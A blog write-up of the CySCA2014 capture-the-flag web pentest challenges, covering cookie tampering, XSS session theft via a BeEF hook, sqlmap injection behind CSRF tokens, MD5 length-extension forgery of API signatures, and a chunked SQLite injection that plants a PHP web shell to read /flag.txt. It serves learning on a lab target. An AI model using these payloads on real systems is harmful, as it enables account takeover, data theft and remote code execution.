CySCA2014 is an Australian cybersecurity challenge that occurred over 24 hours on May 7th, 2014. Afterwards, the challenges were made available for download for anyone interested in attempting them. The link to download CySCA2014 is https://cyberchallenge.com.au/inabox.html. The challenges included web penetration testing, Android forensics, reverse engineering, cryptography, and more. Together with two friends I attempted to solve these challenges and what follows is a write-up of our process. We are only just getting started on CySCA2014 so as we solve more challenges, more blog posts will be added.
Web Application Pentest
Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.
CySCA2014 includes a website for a fictional company called Fortress Certifications. The website has several sections: ‘services’, ‘about’, ‘contact’, ‘blog’, and ‘sign in’. The ‘blog’ section of the website is grayed out and as the challenge description indicates, the user has to become ‘VIP’ to gain access to this section of the website.
Solving this challenge was fairly straight-forward and easy. Firing up Burpsuite and setting up the web browser to use it as a proxy it quickly became clear that the website uses a cookie on the client machine with a parameter for ‘vip’ to determine if a user is a vip or not. Intercepting a request from the client to the server and changing the value from ‘vip=0’ to ‘vip=1’ granted access to the ‘blog’ section of the website and revealed the flag there.
For anyone new to Burpsuite, here’s some information that will make your life a little easier. You can add ‘match and replace’ rules using ‘Proxy’ -> ‘Options’ to automatically change the cookie value from ‘vip=0’ to ‘vip=1’ in the future, so you don’t have to manually change it on each request. Even if you turn intercept off, the request will still be changed. As long as the rule is marked ‘enabled’ you will remain vip.
Om nom nom nom
Gain access to the Blog as a registered user to reveal the hidden flag.
Although we now have access to the blog, we are still identified as ‘guest’ as can be seen in one of the previous screenshots. This challenge requires us to become authenticated as a registered user. Our first instinct was to bruteforce our way in through the ‘sign in’ section of the site, using a list of usernames that was previously found under ‘contact’.
There are various ways in which a login form can be attacked, such as using the ‘intruder’ tool in Burpsuite or using a command line tool such as Hydra. Both of these tools and multiple wordlists were used in an attempt to find a valid combination of username and password, but after several hours of bruteforcing we had to acknowledge that becoming authenticated wouldn’t be as simple as that. In fact, had we taken the time to read the FAQ section of the challenge site we could have saved ourselves a significant amount of time, since it clearly states that bruteforcing passwords is never required.
Alright, so another method of becoming authenticated needs to be found. After browsing around the website and the blog for quite some time trying to find another way in, we noticed that a user was active on one of the blog posts. ‘Sycamore’ had last viewed one of his posts as recently as 37 seconds ago. Clearly there was an automated job set up on the Cysca box where this page was being refreshed regularly while being logged in as user Sycamore.
The first thing that came to mind was to use a cross site scripting (XSS) attack to steal Sycamore’s session ID. However, after leaving numerous comments with XSS code in various formats it became clear that comments were being filtered for this. So if we can’t inject XSS code into the site, how do we steal Sycamore’s session ID?
One thing that we have really enjoyed during almost all of the CySCA2014 challenges we’ve solved so far is that the solution can often be found in small details. In this case, we finally noticed a note underneath the comments section that said: “Links can be added with [Link title](http://example.com)”. So although we can’t insert XSS code into a comment directly, maybe we can add it to a link reference.
We fired up the ‘Beef-xss’ application and – after some playing around with different formats – submitted the following comment:
When viewing the blog entry, the comment only shows up as “pwnt”, but in the background the user’s browser is actually being redirected to 192.168.159.128:3000/hook.js, which ‘hooks’ it into beef-xss and allows us to manipulate it in all sorts of ways. In this case, all we really needed was to steal the session ID from the cookie and use it instead of our own session ID. After doing so, we were successfully authenticated as ‘Sycamore’ and the second flag was shown on the screen.
Remember, like before you can add a ‘match and replace’ rule to Burpsuite to automatically replace your own session ID with Sycamore’s so that you don’t have to manually replace it every time.
Retrieve the hidden flag from the database.
This is where things really started to get challenging. The previous challenge gave us some trouble for a while, but the whole time we knew we were at least on the right track. With this one we had some moments where we were ready to give up. Fortunately, we stuck with it and after many hours of banging our heads against the wall we finally gained access into the database. Here’s how we did it.
Right away, seeing how the flag had to be retrieved from a database, we figured SQL injection would be the way to go. However, during the previous challenge we had moments where we couldn’t figure out how to authenticate as Sycamore and in those moments we had already tested most of the parameters in our GET and POST requests for SQL injection – without success. Still, it didn’t take too long for us to find the parameter that could be injected. Now that we were authenticated as Sycamore we were able to delete comments, and the ‘comment_id’ parameter proved vulnerable to SQL injection. We found out by adding a single quote behind the comment_id value and looking at the server response.
Once we found out that the parameter was vulnerable to SQL injection, we figured we were pretty much done. We couldn’t have been more wrong – this is where the challenge really started. There were several issues we had to overcome before we could go from vulnerability to exploitation.
First of all, the server responses to our SQL injection didn’t correspond to any write-ups of SQL attacks we could find. For instance, one of the first things that write-ups will tell you to do is figure out how many columns are in the table that you’re accessing. You can do this by adding a single quote to the parameter value and then adding “order by 10;–”, which should tell the SQL server to sort the results by column number 10. This will either result in a valid SQL statement, which you can recognize by the command going through (the comment will be deleted), or it will give an error message such as “unknown column ‘10’ in ‘order clause’”. The latter indicates that there are less than 10 columns in the table, so then you have to narrow it down until the command goes through. However, when we tried the ‘order by’ SQL injection, we received the following response from the server:
The server response indicated that it recognized everything we added after the parameter value as incorrect, including the single quote. In other words, we were not successful in ‘breaking out’ of the SQL statement that we were trying to inject into.
We must have spent hours trying to find the right SQL injection to return valuable server information, without any success. Everything we entered would just return the same error message to us (Later on we’ll see that we weren’t encoding our SQL injection commands correctly). At this point you might ask “why didn’t you just use an automated tool such as SQLmap?” Great question; this brings us to issue number two.
The website blog section uses CSRF tokens to prevent cross site request forgery (CSRF). These tokens were also successful in stopping us from running automated SQL injection tools. The reason is that every time a request is issued to the server, it has to include a valid CSRF token. The consequent server response includes a new CSRF token, which has to be issued with the next server request. A token is only valid once, and it is only valid for about 15-30 seconds. We’re not sure exactly of how long it’s valid for but if we waited too long in issuing a request to the server we would invariably get an “invalid CSRF token” error message.
We will spare you all the different ways in which we tried to circumvent this error message; we assume that since you are reading this walkthrough you already tried most if not all of those same tactics and discovered they did not work. The key to success for us was provided through BurpSuite’s ability to run a macro for each incoming request. So basically what we did was tell BurpSuite that every time a server request was intercepted, it had to run a macro that would retrieve the latest CSRF token and to replace the original token with the new one before sending the request on to the server.
Let’s look at that step by step. First, set up the macro that you will use. It needs to be a server request that obtains the new CSRF token, so a simple GET request for a blog page will do just fine. To configure the macro, go to ‘Options -> Sessions -> Macro’ and create a new macro.
When you ‘record’ the macro, just select a simple GET request for a blog page from your HTTP history. Now here’s the important part – you have to go to ‘configure item’ and select a custom parameter location from the server response. This is where we go to select the CSRF token and use it as a parameter in our next request. BurpSuite offers the awesome functionality of allowing you to just select what you wish to extract, and it will generate the appropriate syntax for you.
Now that the macro is set up, we need to create a session handling rule under ‘Options -> Sessions -> Session Handling Rules’. The rule has to specify to run our macro, under ‘rule actions’. You also have to set a scope for the rule, by clicking on the ‘scope’ tag. Here you will only select ‘proxy’ for when the rule will run, and for ‘URL scope’ you can either select ‘include all URLs’ or you can be more specific by selecting ‘use suite scope’. The latter requires you to go to ‘Target -> Scope’ and make sure you have the Cysca box’s URL defined as a target.
Now Burpsuite is configured to replace the CSRF token of incoming requests (sent using Burpsuite as a proxy) with a new and valid CSRF token. The next step is to configure SQLmap to perform SQL injection into the vulnerable parameter and to use Burpsuite as a proxy. The first thing we want to do is generate a ‘delete comment’ POST request that we can use as a template for SQLmap. Generate a ‘delete comment’ request or select one from your HTTP history (make sure it contains Sycamore’s PHPSESSID value in the cookie) and save it into a text file (we just used Leafpad for this). NOTE: Be careful – certain text file editors (vi) will include extra line feeds when you copy and paste a request from Burp into it. These extra line feeds WILL mess up your requests and provide you with invalid results. We spent several hours trying to troubleshoot our macro when all we had to do to get things to work was remove the extra lines from the template file. No fun!!
Alright, now it’s time to fire up SQLmap, tell it to use the text file with the POST request as a template (-r), inform it of which parameter to inject (-p), and point it to BurpSuite as a proxy (–proxy). The command for this is:
sqlmap -r <full path to request file> -p comment_id –proxy=http://127.0.0.1:8080
I would advise to do two things before running this command. (1) Enable intercepting on Burpsuite so that you can see the request that SQLmap is sending out to the server, and (2) go to ‘Options -> Session -> Session Handling Rules’ and click ‘open sessions tracer’. The sessions tracer shows the original incoming request, the macro that is ran, the action taken as a result of running the macro, and the final request that is sent out to the server. You can look at each of these steps and verify that your macro is running correctly and that it is in fact replacing the CSRF token from the template with a new one from the server for each request made. Notice that the SQL injection that is added to the ‘comment_id’ parameter is HTML encoded. This is why we were previously unable to get information back from the server using manual SQL injection – we weren’t encoding our commands properly.
One more tip for this challenge; if you followed all of the steps described here and you are still having trouble performing SQL injection into the comment_id parameter, try running sqlmap with a delay on its requests (–delay = 1 for a 1 second delay). We ran into a situation where our macro was running as intended, and looking at the individual requests in the session tracer showed that Burpsuite was inserting a fresh CSRF token into each request before sending it on, but we were still getting ‘invalid CSRF token’ errors in our responses. Again, we must have spent hours troubleshooting this issue when in the end, including a simple one-second delay in our SQLmap request fixed the issue. We’ve also been able to successfully run attacks against the server without this delay so it doesn’t seem to be required, but it’s just something that seemed to work for us when it wouldn’t work without the delay. We thought we’d include it in this walkthrough in case someone else experiences the same thing.
Now that we can successfully run a SQL injection attack against the server, getting the hidden flag is a piece of cake. First we need to enumerate all the databases on the server by using the ‘– dbs’ command. This will reveal that there are two databases: ‘cysca’ and ‘information_schema’. For this challenge, only the ‘cysca’ database is of interest. Next we have to enumerate the tables in the cysca database. We can do this by specifying the database with ‘-D sysca’ and using the ‘– tables’ flag. There are five tables in the ‘cysca’ database: ‘user’, ‘blogs’, ‘comments’, ‘flag’, and ‘rest_api_log’. Finally, we can dump the information in the ‘flag’ table using the ‘-D cysca’, ‘-T flag’, and ‘–dump’ flags. This reveals that the hidden database flag is “CeramicDrunkSound667”.
Retrieve the hidden flag by gaining access to the caching control panel.
Our first question upon reading this challenge was “What the fuck is the caching control panel??” We had never heard of this before, despite at least one of us being somewhat familiar with web servers. Google did not help us out much, so we figured we’d just start on the challenge and hoped that it would become clearer as we made progress.
We started on this challenge by enumerating pretty much everything in the database that we had just compromised. The screenshots below show some of the information that was logged into the ‘log’ file for the server under /usr/share/sqlmap/output.
The ‘users’ table provided us with information on three registered users, including their password hashes and salts, while the ‘rest_api_log’ table provided GET, POST, and PUT requests that had been previously submitted to the server, including an API key for one user.
Our first attempt at making progress on this challenge was to try and crack the user passwords. Again, this was a waste of time as bruteforcing is never required according to the Cysca FAQ. However, we reached this point before any of us had looked at the FAQ. Hopefully you did not make the same mistake. Needless to say; running hashcat with multiple wordlists and rules did not result in any cracked passwords.
Next we decided to see if we could attack the site’s rest API. On the website’s blog there is a post made by Sycamore that refers to the rest API specification, located at “<cysca>/api/documents/id/3”. Below is a screenshot of the document.
The document describes a couple of things: (1) that any request that modifies content (POST, PUT, and DELETE) needs to be signed with an API signature, (2) how a valid API signature is calculated, (3) what parameters need to be included in GET, POST, and PUT requests, and (4) what a valid and signed POST request looks like. At this point it was pretty clear that we needed to find a way to submit valid POST and /or PUT requests to the server. We didn’t know how it would help us locate the flag in the caching control panel, but we knew it would help us get there. So somehow we need to find a way to create valid API signatures.
The problem is that the calculation for an API signature includes a shared secret. Without the shared secret, it is impossible to create a valid API signature – at least at first glance. Our first attempt at creating an API signature…. Bruteforcing. Seriously – I will never again attempt a CTF challenge without reading the FAQ first.
Our thought process was as follows: We couldn’t crack the password hashes that we found in the database, but we assumed that a user’s password would be the same as their ‘shared secret’ for their API signatures. Since we had obtained a couple of valid API calls including signatures from the database, we might be able to uncover the secret by recreating the known API call and using a wordlist to insert the secret into it. The assumption here is that we were unable to previously crack the passwords due to them being salted, but now we might be successful because the salt doesn’t come into play for the API signature.
We created a script that took the string “contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf”, inserted an entry from a wordlist in front of it (as the secret), created an MD5 hash of the string, and then compared this MD5 hash to the one we knew to be valid for the API call. If the wordlist entry was equal to the secret, then the two MD5 hash values should be the same. Of course, even after using several different wordlists (and waiting for long periods of time for the script to finish) we did not find the secret. So now we were somewhat at a loss. If we don’t know the secret we can’t create valid API signatures, and if we can’t create these signatures then we can’t place valid API calls.
So we did what you should always do when you are at a loss for answers: we turned to Google. After a couple of different queries one of us stumbled on something called a ‘length extension attack’. A length extension attack is something that can be used to calculate a valid hash when you have the hash of (secret + message) and you know both the message and the length of the secret, even if you don’t know the secret itself. This sounded almost exactly like what we were faced with, although we didn’t know the length of our secret.
Length extension attacks work due to a vulnerability in numerous hashing algorithms, including MD5. The vulnerability has to do with how these algorithms calculate a hash value. For instance, MD5 uses blocks of a specific length (512 bits). The value of (secret + message) is padded with a ‘1’ bit and a number of ‘0’ bits followed by the length of the string (the string being secret + message). So while the hexadecimal value of (secret + message) might be “73 65 63 72 65 74 64 61 74 61” (secretdata), the MD5 algorithm will add padding and a length indicator to it before hashing so that it looks like this:
“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00”
So how can this be exploited? Well, the specifics get a little complicated here, so we’ll refer you to two excellent sources on the details of length extension attacks: https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks and https://blog.whitehatsec.com/hash-length-extension-attacks/.
Although we can’t say we completely understand the specifics of length extension attacks, we’ll try to put into words our understanding from what is explained in the two sources above in the hopes we don’t fuck it up too much. Basically, you can add information to the string that you want to include in the calculation of the hash. For instance, instead of hashing “secretdata” we might want to calculate the hash of “secretdatamoredata” The length extension attack will not work if you simply add stuff to the original message. However, it WILL work if you include the padding, and then add additional information to the end of that. Adding the hex value “6d 6f 72 65 64 61 74 61” (moredata) to the end gives us:
“73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00 6d 6f 72 65 64 61 74 61” The MD5 hashing algorithm will first calculate the hash for the first 512 bits (which will result in the hash that we already know) and it will use that value as a starting point for the calculation of the added data. Since we know the original hash, we can add information to the message without ever knowing the secret and still calculate a valid hash value! However, we do need to know the length of the secret because otherwise we would not know how much padding to add to get to 512 bits. So let’s move on from the theory and look specifically at how we were able to implement the length extension attack.
As mentioned previously, we understood the gist of the length extension attack but we didn’t know enough about hashing algorithms or cryptography to execute this attack ourselves from scratch. Fortunately there are smarter people than us around who wrote tools to make such an attack a lot easier to do. Two such tools are ‘HashPump’ and ‘hash_extender’, both of which can be downloaded from Github. We ended up using HashPump so I will use that in my write-up of the challenge, but hash_extender offers the same functionality and both are very easy to use.
To use HashPump it requires the following arguments: (1) original message, (2) original hash, (3) message / data to add, and (4) length of the original secret. We had three out of these four arguments – we did not know the length of the secret. To overcome this obstacle we wrote a script with a loop that included the three variables we did know and incremented the value for ‘length of the original secret’ by one on each loop. At the end of each loop it would submit a POST request to the server, formatted according to the description in the rest-api-v2.txt document and it would display the resulting server response. Please note that we didn’t get all the syntax and formatting correct in this script right away. Like everything else during Cysca2014 it took us several hours to write a script that did exactly what we wanted. For instance, figuring out that the padding provided by HashPump needed to be converted from ‘\x00’ to ‘%00’ before the server would accept the request took a very long time by itself. But eventually we were rewarded for our efforts with a server response that said “error: file path does not exist”. We now knew that the length of ‘secret’ was 16 characters.
So now we have all the information we need to create valid API signatures, right? Yes and no. Yes, we can create a valid signature for certain types of modified requests, but what can we do now? We can’t modify the original request (at least, at this point we didn’t think we could) because the length extension attack depends on the original message and hash to calculate a new one for the appended data. So all we can do is add something to the end. We tried moving back directories (adding ‘/../../../../var/www/index.php’) and even pointing to files that we knew existed (adding ‘/../rest-api-v2.txt’) but no matter what we added, we always received the “error: file path does not exist” message. Clearly we were still missing something.
After more experimentation and Googling, we finally came across some helpful information. Ironically, this information was found on the Github page (https://github.com/bwall/HashPump) for the tool that we had been using all along – HashPump – driving home once again the importance of attention to detail and carefully going through documentation. Looking at their example of a length extension attack, the information that they append to the original request is actually a parameter that has already been assigned a value. The idea here is that the parameter is given the value that was assigned to it last, so by re-assigning a value to the parameter you can actually overwrite the original value without having to modify the original request. The screenshot below shows what that would look like in HashPump. We’re giving the ‘filepath’ parameter a new value. However, the server does not accept our new API signature as valid.
We’ve seen previously that our method of calculating new API signatures with a length extension attack is correct, so we must be doing something else wrong. As it turns out, we were doing two things wrong. First of all, we weren’t adding the new value for filepath to HashPump in the correct way. Remember, the REST API documentation specifies that all ‘&’ and ‘=’ symbols need to be removed from the parameter list when calculating the API signature. Although we were doing this in HashPump for the original message, we completely forgot to do it for the appended information. So the server would calculate the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdffilepath/../../../../var/www/index.php”.
Meanwhile HashPump was calculating the API signature on the string “SECRETcontenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf&filepath=/../../../../var/www/index.php”.
Clearly, these strings would lead to different API signatures. However, after correcting this mistake the server would still not accept our API signature. Apparently the server was processing the request differently than we were expecting. Maybe it was not simply overwriting the parameter with the last assigned value, or maybe it was overwriting it before calculating the API signature. In both of those cases, the resulting API signature would be different from the one we calculated using HashPump.
Again we returned to Google for ideas on what to do next, and this time we stumbled on one of the most famous examples of a length extension attack: The exploitation of Flickr’s REST API in 2009. A write-up of this attack can be found here: http://netifera.com/research/flickr_api_signature_forgery.pdf.
We noticed two things while reading this write-up: (1) the scenario provided in this Cysca challenge is identical to the vulnerability in Flickr’s REST API down to the description of the API itself, and (2) we completely missed a vulnerability in how the API signature is calculated. What we failed to pick up on initially is that with the way an API signature is calculated, a signature for “filepath=./example.pdf” is equivalent to the signature for “f=ilepath./example.pdf”. The reason for this is that for the calculation of the signature, the ‘&’ and ‘=’ symbols are removed from the string, so for both examples the resulting string on which the signature is calculated would be “filepath./example.pdf”. This is the crucial factor in this challenge that allowed us to generate valid API keys while modifying the original request.
We ended up using this information by assigning almost everything in the original message to a parameter named just ‘c’ – the first letter in the original message – that would be ignored by the server, since ‘c’ is not a parameter that makes sense to the server. We then used HashPump to append the original parameter names to the request and generate a valid signature. The following screenshots show what that looks like, from the command line as well as the request that was issued to the server.
Finally! We were able to modify the values for the parameters that get submitted to the server while still being able to use the original message to perform a length extension attack and generate a valid API signature!
Now, all we have to do is find the path to an existing file on the server. We know that the file ‘index.php’ exists, since it gets included in the URL to reach the Fortress Certifications front page. Apparently, it is not located at ‘/var/www/index.php’, which is where it commonly resides. Instead, it is located in the same directory as the ‘documents’ folder. This was found out after trying a couple of different requests with different file paths, until the message below was received.
This message indicates that the REST API created a new link to a document – ‘index.php’. The link is located at http://192.168.198.128/api/documents/id/14. Note that the IP address for the host has changed from before (it used to be 192.168.159.129) but this is because of changes in our virtual network settings and not because of the request to the REST API.
Navigating to this URL provides us with a download prompt, and opening the downloaded file provided us with more information about other files that might be worth looking at: ‘cache.php’, and ‘caching.php’.
We can repeat the same process as before to also create links to these files through the REST API. After doing so, and opening ‘cache.php’, we found the flag that marks the completion of this challenge: “OrganicPamperSenator877”.
Reveal the final flag, which is hidden in the /flag.txt file on the web server.
The ‘index.php’ and ‘cache.php’ files tell us how we can get to the caching control panel. We need to generate an MD5 hash of “OrganicPamperSenator877” and append it to http://<host>/cache.php?access=”. Doing so brings us to the page below.
The caching control panel enables the caching of certain pages. We can enter a title and a URL for a page, and it will be stored as a cached page in the backend database. How this works exactly can be learned by investigating the source code for ‘cache.php’ and ‘caching.php’. These pages contain the functions and logic that work behind the scenes when a request is submitted through this page, and thoroughly investigating the source code can reveal any flaws or vulnerabilities in the caching process.
Through code investigation and some experimentation we were able to determine that the ‘Title’ field is vulnerable to code injection. After submitting a query, the function that inputs the data into the database is “setCache”, which takes the parameters ‘key’, ‘title’, ‘uri’, and ‘data’. Additionally it uses the database function ‘datetime()’ to insert the date and time of when the query was submitted into the database. This function can be seen below. The ‘title’ and ‘uri’ variables come from what we enter into the caching control panel. The ‘key’ variable is an MD5 hash of the server name plus the requested URI, and ‘data’ is the contents of the page that was entered into the ‘URI’ field.
It’s possible to break out of this function through the use of single quotation marks and entering self-chosen values for the variables that the function is expecting. The result of doing so can be seen below.
Even though we get a syntax error, generated by the remaining code behind our injection, the function executes just fine and our self-chosen values get entered into the database. Additionally, by using a SQLite function – random() – in our injection we determined that we can successfully execute other SQLite functions besides datetime(). We knew the backend database was SQLite because this was specified in the source code of ‘caching.php’
This is where we got stuck on this challenge. It seems clear that we have to use code injection and database functions to get to the ‘/flag.txt’ file on the server, but there are two constraining factors that make this challenge extremely difficult: (1) there is a character limit of 40 characters on the ‘Title’ field in the caching control panel. This makes it almost impossible to inject anything useful, and (2) while there is no character limit on the ‘URI’ field, anything entered into this field gets parsed and validated by functions in ‘caching.php’, which makes it seemingly impossible to inject anything into this field.
We spent many hours experimenting with different types of injections and different strategies. We found a page online that explains how to exploit a SQLite database through the use of the ‘ATTACH DATABASE’ command: http://atta.cked.me/home/sqlite3injectioncheatsheet. However, it seemed like this strategy would not work for us due to the limit on how many characters we could enter. Eventually we decided that this challenge was beyond us and we decided to look at the walkthrough posted on the CySCA2014 website: https://cyberchallenge.com.au/CySCA2014_Web_Penetration_Testing.pdf.
Since we didn’t solve this challenge, I won’t provide a description of the solution. Instead I recommend you follow the link above for a walkthrough of the problem. After reading the solution, we were glad we didn’t spend more time on trying to solve it than we already had because the walkthrough blew our minds. There was no way we could have figured this out for ourselves. We were on the right path but the steps that had to be taken to get around the character limit were ridiculous. For the remainder of this walkthrough I will focus on explaining the steps in the CySCA solution, since I don’t think their walkthrough provides a lot of clarification on how to get to ‘/flag.php’. Even after following their steps it took us some time and reasoning to figure out why they worked.
The walkthrough describes that the goal is to inject the following 122-character string into the database:
‘,0); ATTACH DATABASE ‘a.php’ AS a; CREATE TABLE a.b (c text); INSERT INTO a.b VALUES (‘<? system($_GET[”cmd”]); ?>’);/*
The way this is accomplished is by breaking the string up into smaller sections and piecing them back together at a later point. The four strings that are individually injected will be:
- ”,0);ATTACH DATABASE ”a.php” AS a;/*
- */CREATE TABLE a.b (c text);INSERT /*
- */INTO a.b VALUES(”<? system($”||/*
- */”_GET[””cmd””]); ?>”);/*
Each string starts with the end to a block comment (*/) and ends with the start to a block comment (/*), except for the first string which doesn’t start with one. This ensures that any code that might make its way in between these strings is commented out – this is what allows these individual database entries to be pieced back together into a single injection string. After performing the code injection, the caching control page will look as below:
You’ll notice that the third entry looks incomplete. However, investigation of the source code of the page reveals that the injected code is all there, it’s just being interpreted differently by your browser.
So what is this supposed to do, once pieced back together? The ‘ATTACH DATABASE’ command will attach a database file to SQLite, but if this file doesn’t exist it will be created. Therefore, effectively this command is creating a file called “a.php”. The rest of the commands first create a table in the newly created database (table a.b) with a single column named ‘text’. One line is inserted into this database table: “<? System($’ ||’_GET[‘’cmd’’]”. This code will eventually find its way into the database file ‘a.php’, and ‘a.php’ should then be accessible as a web page where it will attempt to execute a given system command. So effectively the injection code will provide us with a shell on the system through a web page.
The way in which these four lines of code are pieced back together is by caching the ‘cache.php’ page itself. It took us a while to reason out how caching the caching page would execute this code, but it works because of the first line of injection code. You’ll notice that it starts with “’,0);”. Thinking back to the ‘setCache’ function in the ‘caching.php’ source code you’ll remember that it required five variables, the fourth of which was ‘$data’. The ‘data’ variable contained the source code for whatever page was being cached. By starting the first line of injection code with “’,0);” we’re effectively breaking out of the ‘data’ variable and executing the code that comes after – the code that attaches the database.
So by caching the ‘cache.php’ page, the setCache() function will look at the source code for the page that is being cached: ‘cache.php’. On the page it will encounter the first line of injection code, which breaks out of the ‘data’ variable. It then executes the rest of the code until it gets to the block comment marker (/*). It ignores whatever comes next until the end of the block comment marker is encountered, which is at the beginning of the next line of injection code. This continues until all four lines of injection code have been pieced together, and they then get executed, causing ‘a.php’ to be created with the code that allows us to execute commands on the system. The screenshots below show this process.
NOTE: I messed up my commands, resulting in a file ‘a.php’ which did not allow me to execute system commands. I entered everything again but of course table ‘a’ and column ‘a.b’ already existed, so in the rest of the screenshots you will see ‘z.php’ and database ‘z’ instead.
As shown above, accessing ‘z.php’ and feeding it the ‘ls’ command returns the contents of the working directory. The SQLite information at the start of the file is there because SQLite created ‘z.php’ as a database file, so it has additional database information in it. It doesn’t interfere with our commands though, and feeing the system command ‘cat /flag.txt’ returns to us the final flag for the web application pentest section of CySCA2014: “TryingCrampFibrous963”.